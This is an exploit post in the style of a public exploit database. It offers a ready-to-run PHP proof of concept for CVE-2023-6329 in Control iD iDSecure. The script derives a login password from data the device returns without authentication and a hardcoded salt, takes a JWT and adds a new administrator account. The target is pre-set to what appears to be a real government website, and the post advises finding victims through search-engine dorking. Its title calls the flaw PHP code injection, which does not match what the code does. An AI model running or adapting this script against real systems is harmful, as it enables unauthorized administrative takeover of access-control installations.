=============================================================================================================================================
| # Title     : Control iD iDSecure v4.7.43.0 PHP Code Injection Vulnerability                                                              |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://profil.nunukankab.go.id/org/dkisp                                                                                   |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description:  The code exploits a vulnerability in the ControlID system to add a new administrative user without requiring an existing password.
	
	( https://packetstorm.news/files/id/180858/  CVE-2023-6329)
	
[+] save code as poc.php.

[+] Set Target : line 114

[+] USage : php poc.php 

[+] PayLoad :

<?php

class ControlIDExploit {
    private $target;
    private $new_user;
    private $new_password;

    public function __construct($target, $new_user, $new_password) {
        $this->target = rtrim($target, '/'); // إزالة أي "/" زائدة في النهاية
        $this->new_user = $new_user;
        $this->new_password = $new_password;
    }

    private function send_request($method, $uri, $data = null, $headers = []) {
        $url = "{$this->target}{$uri}";
        $ch = curl_init($url);

        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10); // مهلة الطلب 10 ثوانٍ

        if ($data) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data, JSON_UNESCAPED_UNICODE));
            $headers[] = 'Content-Type: application/json';
        }

        if (!empty($headers)) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        }

        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $error = curl_error($ch);
        curl_close($ch);

        if ($error) {
            die(" Error connecting to $url: $error\n");
        }

        if ($http_code == 404) {
            die(" Unexpected response (404 - Not Found): Check the link is valid $url\n");
        }

        return json_decode(mb_convert_encoding($response, 'UTF-8', 'auto'), true);
    }

    public function exploit() {
        echo " Trying to get the raw data...\n";
        
        // 1) الحصول على serial و passwordRandom
        $response = $this->send_request('GET', '/api/login/unlockGetData');
        
        if (!isset($response['passwordRandom']) || !isset($response['serial'])) {
            die("❌ Failed to get raw data. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
        }

        $password_random = $response['passwordRandom'];
        $serial = $response['serial'];

        echo " Retrieved passwordRandom: $password_random\n";
        echo " Retrieved serial: $serial\n";

        // 2) إنشاء passwordCustom
        $sha1_hash = sha1($serial);
        $combined_string = $sha1_hash . $password_random . 'cid2016';
        $sha256_hash = hash('sha256', $combined_string);
        $short_hash = substr($sha256_hash, 0, 6);
        $password_custom = hexdec($short_hash);

        echo " Created passwordCustom: $password_custom\n";

        // 3) تسجيل الدخول للحصول على JWT
        echo "Attempt to login...\n";
        $login_data = [
            'passwordCustom' => (string)$password_custom,
            'passwordRandom' => $password_random
        ];

        $response = $this->send_request('POST', '/api/login/', $login_data);
        if (!isset($response['accessToken'])) {
            die(" Login failed. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
        }

        $access_token = $response['accessToken'];
        echo " Obtained JWT: $access_token\n";

        // 4) إضافة مستخدم إداري جديد
        echo " Trying to add a new user...\n";
        $user_data = [
            'idType' => '1',
            'name' => $this->new_user,
            'user' => $this->new_user,
            'newPassword' => $this->new_password,
            'password_confirmation' => $this->new_password
        ];

        $headers = [
            "Authorization: Bearer $access_token"
        ];

        $response = $this->send_request('POST', '/api/operator/', $user_data, $headers);
        if (!isset($response['code']) || $response['code'] != 200) {
            die(" Failed to add new user. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
        }

        echo " User added successfully: {$this->new_user}:{$this->new_password}\n";
    }
}

// 🔥 أدخل بيانات الاستهداف هنا
$target_host = 'https://profil.nunukankab.go.id'; // استبدل بعنوان الموقع
$new_admin_user = 'adminuser';
$new_admin_password = 'securepassword';

// تشغيل الكود
$exploit = new ControlIDExploit($target_host, $new_admin_user, $new_admin_password);
$exploit->exploit();


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================